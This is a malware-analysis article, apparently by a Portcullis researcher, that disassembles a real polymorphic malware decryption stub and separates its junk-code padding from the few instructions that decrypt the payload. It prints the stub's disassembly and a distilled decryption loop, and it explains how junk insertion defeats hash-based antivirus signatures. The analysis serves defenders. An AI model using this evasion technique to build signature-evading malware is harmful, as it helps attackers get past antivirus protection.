With hundreds of thousands of malware samples floating around the internet, AV companies have to struggle everyday in order to keep their detection signatures updated. These malware samples are not necessarily all functionally different to each other, but most of them try to appear different in an attempt to bypass AV products.
In reality, the concept of polymorphism is still much more popular than metamorphism. The reason for this is, that polymorphism as we know it today, through malware samples is far easier to achieve.
While metamorphism requires re-implementing parts of the code, while keeping the same functionality, polymorphism is generally applied by keeping the code intact but encrypting it each time with a different method or via the use of different encryption keys. Metamorphism also commonly uses the insertion of junk code that can be changed quickly, making it effective at defeating static detection, though the insertion of junk code. This could also be considered as ‘cheap metamorphism’ since no real re-implementation of the code was done, but the code does appear different.
Consider these two concepts as follows: polymorphism is mainly applied to the code itself, while metamorphism is usually applied to the code decryption routine which always operates as the first layer of execution.
Both techniques will cause the generation of a different executable which implies that the file hash calculated for it will be different. Furthermore, even hashes of byte streams for individual sections of the executable itself might be also affected.
During this article we will show a piece of code from real malware, analyse how metamorphism using junk code is undertaken, discuss why its use can often be considered as more practical than re-implementing the code or changing it’s logic, and show how it is extremely efficient when combined with polymorphic malware.
As mentioned, AV companies have to keep up with a lot of new malware samples coming out every day. This requires automation. It really does make automation a necessary evil. This in itself, whilst good for business, does lead to blind trust in antivirus programs.
Furthermore, even when automation is not used, speed is of the essence in both the updating of signatures and functionally surrounding the detection engine.
Malware analysts in AV companies are literally bombarded by client requests to quickly analyse malware and push out new detection signatures. There is simply no time to lose. So, in order for the analyst to catch up with this process, his first choice will be to create a static signature based on the hash of either the entire file or for a portion of it.
This is used as hash based detection signatures are efficient, fast, and highly unlikely to trigger any false positives.
This whole process can be summarised by the famous quote “So few are the easy victories as the ultimate failures.” (Marcel Proust)
Going through metamorphic code in order to understand which are the ‘reserved’ pieces of code used for breaking signature based detection is not a trivial task, and often requires extra time, but it really is worth it.
The main reason is that when we finally exclude the code used to obfuscate the useful instructions, we can establish which parts of the code are likely to change in a future sample and which parts of the code are likely to remain the same.
Note: We will be marking in red the junk code dedicated to achieving metamorphism. We will also mark with green the real effective instructions of the decryption stub. The code we are analysing is the decryption stub from real malware which is responsible for the polymorphic effect of the viral code.
Let’s take a look at the following chunk:
0040CC90 0FB7C1 MOVZX EAX, CX 0040CC93 3D 5CB13083 CMP EAX, 8330B15C 0040CC98 0FA5FF SHLD EDI, EDI, CL 0040CC9B C70424 00000000 MOV DWORD PTR SS:[ESP], 0 0040CCA2 810424 28BC0000 ADD DWORD PTR SS:[ESP], 0BC28← set the counter 0040CCA9 0FAFD7 IMUL EDX, EDI 0040CCAC E8 09000000 CALL 0040CCBA 0040CCB1 61 POPAD 0040CCB2 8D1D 314F6B01 LEA EBX, DWORD PTR DS:[16B4F31] 0040CCB8 89ED MOV EBP, EBP 0040CCBA 55 PUSH EBP 0040CCBB 8BEC MOV EBP, ESP 0040CCBD 51 PUSH ECX 0040CCBE 58 POP EAX 0040CCBF FFF1 PUSH ECX 0040CCC1 59 POP ECX 0040CCC2 33F1 XOR ESI, ECX 0040CCC4 5D POP EBP 0040CCC5 58 POP EAX 0040CCC6 56 PUSH ESI 0040CCC7 5E POP ESI 0040CCC8 57 PUSH EDI 0040CCC9 33D7 XOR EDX, EDI 0040CCCB 52 PUSH EDX 0040CCCC 5F POP EDI 0040CCCD 89DD MOV EBP, EBX 0040CCCF 5A POP EDX 0040CCD0 50 PUSH EAX 0040CCD1 5F POP EDI 0040CCD2 51 PUSH ECX 0040CCD3 5E POP ESI 0040CCD4 BB 0001A041 MOV EBX, 41A00100 0040CCD9 C1CB 72 ROR EBX, 72
We can see a lot of code with only four effective instructions, their only purpose is to set up the loop counter and make EBX point to the entry point of the real code at address 0×00401068 which is the VA of the real entry point.
0040CCDC F6D4 NOT AH 0040CCDE 86C2 XCHG DL, AL 0040CCE0 8D35 829BEB32 LEA ESI, DWORD PTR DS:[32EB9B82] 0040CCE6 8AE9 MOV CH, CL 0040CCE8 F7C7 812DF168 TEST EDI, 68F12D81 0040CCEE 0FBEC9 MOVSX ECX, CL 0040CCF1 F6D9 NEG CL 0040CCF3 69C2 C922C039 IMUL EAX, EDX, 39C022C9 0040CCF9 C003 B4 ROL BYTE PTR DS:[EBX], 0B4 0040CCFC 81D7 116F4A02 ADC EDI, 24A6F11 0040CD02 0FBBC0 BTC EAX, EAX 0040CD05 FFF2 PUSH EDX 0040CD07 57 PUSH EDI 0040CD08 56 PUSH ESI 0040CD09 55 PUSH EBP 0040CD0A 5E POP ESI 0040CD0B 5F POP EDI 0040CD0C 33D4 XOR EDX, ESP 0040CD0E 46 INC ESI 0040CD0F 5D POP EBP 0040CD10 5E POP ESI 0040CD11 8D2D BEB17602 LEA EBP, DWORD PTR DS:[276B1BE] 0040CD17 56 PUSH ESI 0040CD18 3BE5 CMP ESP, EBP 0040CD1A 45 INC EBP 0040CD1B 5E POP ESI 0040CD1C 41 INC ECX 0040CD1D 8033 3F XOR BYTE PTR DS:[EBX], 3F 0040CD20 0FCF BSWAP EDI 0040CD22 0FBAF8 A2 BTC EAX, 0A2 0040CD26 0FA4C7 E5 SHLD EDI, EAX, 0E5 0040CD2A 19D2 SBB EDX, EDX 0040CD2C 0FAFFB IMUL EDI, EBX 0040CD2F 8AC7 MOV AL, BH 0040CD31 35 8C7F9BE9 XOR EAX, E99B7F8C 0040CD36 88E1 MOV CL, AH 0040CD38 0FA4D9 10 SHLD ECX, EBX, 10 0040CD3C 8033 B7 XOR BYTE PTR DS:[EBX], 0B7
In the code above we can see a lot of junk instructions that can be modified to break static detection signatures and only three effective instructions dedicated to the decryption of the viral code.
0040CD3F FFF5 PUSH EBP 0040CD41 56 PUSH ESI 0040CD42 55 PUSH EBP 0040CD43 47 INC EDI 0040CD44 59 POP ECX 0040CD45 42 INC EDX 0040CD46 F8 CLC 0040CD47 5E POP ESI 0040CD48 58 POP EAX 0040CD49 8D3D C36F1B00 LEA EDI, DWORD PTR DS:[1B6FC3] 0040CD4F 56 PUSH ESI 0040CD50 3BC0 CMP EAX, EAX 0040CD52 5A POP EDX 0040CD53 8D35 F5A52602 LEA ESI, DWORD PTR DS:[226A5F5] 0040CD59 8D0D C8F63800 LEA ECX, DWORD PTR DS:[38F6C8] 0040CD5F 8D15 52E55000 LEA EDX, DWORD PTR DS:[50E552] 0040CD65 8BE8 MOV EBP, EAX 0040CD67 8003 98 ADD BYTE PTR DS:[EBX], 98 0040CD6A 8D05 2D26B201 LEA EAX, DWORD PTR DS:[1B2262D] 0040CD70 8D05 D0FD7900 LEA EAX, DWORD PTR DS:[79FDD0] 0040CD76 8D15 5B59CF01 LEA EDX, DWORD PTR DS:[1CF595B] 0040CD7C BE 1DB22901 MOV ESI, 129B21D 0040CD81 6A E0 PUSH -20 0040CD83 47 INC EDI 0040CD84 5D POP EBP 0040CD85 33CC XOR ECX, ESP 0040CD87 F9 STC 0040CD88 C003 02 ROL BYTE PTR DS:[EBX], 2
Notice how much space is reserved for future code modification, this allows for easy modification to the executable.
0040CD8B 48 DEC EAX 0040CD8C 0FA4F8 C9 SHLD EAX, EDI, 0C9 0040CD90 19C2 SBB EDX, EAX 0040CD92 D2E6 SHL DH, CL 0040CD94 0FC1D7 XADD EDI, EDX 0040CD97 0FADF7 SHRD EDI, ESI, CL 0040CD9A 8D3D 39273EB6 LEA EDI, DWORD PTR DS:[B63E2739] 0040CDA0 8033 31 XOR BYTE PTR DS:[EBX], 31 0040CDA3 52 PUSH EDX 0040CDA4 58 POP EAX 0040CDA5 51 PUSH ECX 0040CDA6 50 PUSH EAX 0040CDA7 F7D6 NOT ESI 0040CDA9 5F POP EDI 0040CDAA 5D POP EBP 0040CDAB FFF6 PUSH ESI 0040CDAD 0F49F1 CMOVNS ESI, ECX 0040CDB0 89EE MOV ESI, EBP 0040CDB2 F8 CLC 0040CDB3 47 INC EDI 0040CDB4 59 POP ECX 0040CDB5 51 PUSH ECX 0040CDB6 50 PUSH EAX 0040CDB7 84C2 TEST DL, AL 0040CDB9 59 POP ECX 0040CDBA 58 POP EAX 0040CDBB 0FB6CE MOVZX ECX, DH 0040CDBE 56 PUSH ESI 0040CDBF 5D POP EBP 0040CDC0 52 PUSH EDX 0040CDC1 5F POP EDI 0040CDC2 57 PUSH EDI 0040CDC3 46 INC ESI 0040CDC4 5D POP EBP 0040CDC5 0FAFCE IMUL ECX, ESI 0040CDC8 55 PUSH EBP 0040CDC9 41 INC ECX 0040CDCA 5E POP ESI 0040CDCB 42 INC EDX 0040CDCC C003 C7 ROL BYTE PTR DS:[EBX], 0C7
More junk code, but only two effective instructions involved in the decryption routine.
0040CDCF F7C5 A22F73DC TEST EBP, DC732FA2 0040CDD5 C1E7 76 SHL EDI, 76 0040CDD8 15 47BA711D ADC EAX, 1D71BA47 0040CDDD D2CC ROR AH, CL 0040CDDF 84D7 TEST BH, DL 0040CDE1 8AE9 MOV CH, CL 0040CDE3 8D5B 01 LEA EBX, DWORD PTR DS:[EBX+1]← increase pointer 0040CDE6 51 PUSH ECX 0040CDE7 66:B9 CE27 MOV CX, 27CE 0040CDEB 41 INC ECX 0040CDEC 5D POP EBP 0040CDED 68 B4345F02 PUSH 25F34B4 0040CDF2 0F4AC6 CMOVPE EAX, ESI 0040CDF5 58 POP EAX 0040CDF6 FFF6 PUSH ESI 0040CDF8 FFF7 PUSH EDI 0040CDFA F5 CMC 0040CDFB 5F POP EDI 0040CDFC 8BF5 MOV ESI, EBP 0040CDFE F7D7 NOT EDI 0040CE00 5A POP EDX 0040CE01 68 9FA07100 PUSH 71A09F 0040CE06 0F40EF CMOVO EBP, EDI 0040CE09 59 POP ECX 0040CE0A 40 INC EAX 0040CE0B FF0C24 DEC DWORD PTR SS:[ESP]← decrease counter 0040CE0E 0F85 C8FEFFFF JNZ 0040CCDC← loop up 0040CE14 0FC1F3 XADD EBX, ESI 0040CE17 01C2 ADD EDX, EAX 0040CE19 C6C4 B0 MOV AH, 0B0 0040CE1C 8BF7 MOV ESI, EDI 0040CE1E 0FBBF6 BTC ESI, ESI 0040CE21 0FC8 BSWAP EAX 0040CE23 88FA MOV DL, BH 0040CE25 0FAFFB IMUL EDI, EBX 0040CE28 2BDB SUB EBX, EBX 0040CE2A 0F84 3842FFFF JE 00401068← jump to decrypted code 0040CE30 70 15 JO SHORT 0040CE47 0040CE32 55 PUSH EBP 0040CE33 3C FC CMP AL, 0FC 0040CE35 5A POP EDX 0040CE36 68 511F4601 PUSH 1461F51 0040CE3B C1CA 89 ROR EDX, 89 0040CE3E 58 POP EAX 0040CE3F C1DA 5E RCR EDX, 5E 0040CE42 0F48D4 CMOVS EDX, ESP 0040CE45 F9 STC 0040CE46 F9 STC 0040CE47 52 PUSH EDX 0040CE48 5B POP EBX
The code we just examined leaves a lot of space for junk code modification which breaks any static signature based on it.
Among all these instructions only a few were real instructions, which need to stay the same if we wanted to keep the same encryption/decryption routine.
MOV DWORD PTR SS:[ESP], 0 ADD DWORD PTR SS:[ESP], 0BC28 MOV EBX, 41A00100 ROR EBX, 72 _Loop: ROL BYTE PTR DS:[EBX], 0B4 XOR BYTE PTR DS:[EBX], 3F XOR BYTE PTR DS:[EBX], 0B7 ADD BYTE PTR DS:[EBX], 98 ROL BYTE PTR DS:[EBX], 2 XOR BYTE PTR DS:[EBX], 31 ROL BYTE PTR DS:[EBX], 0C7 LEA EBX, DWORD PTR DS:[EBX+1] DEC DWORD PTR SS:[ESP] JNZ _Loop SUB EBX, EBX JE 00401068
In short, in a piece of code totalling 441 bytes in length, only 63 bytes correspond to effective instructions, which means that almost 86% of the space occupied for the code we analysed is dedicated to the metamorphic engine.
Through this article we have tried to demonstrate a practical example of metamorphic decryption stubs, achieved through junk code insertion. As shown, by inserting a lot of junk instructions among the useful ones, it is possible to reserve a lot of space for future modifications that would break static signatures that include those portions of code as a matching pattern. It also highlights why malware authors usually prefer this technique to bypass AVs while still using the same viral code.
Written by: Kyriakos Economou of Portcullis.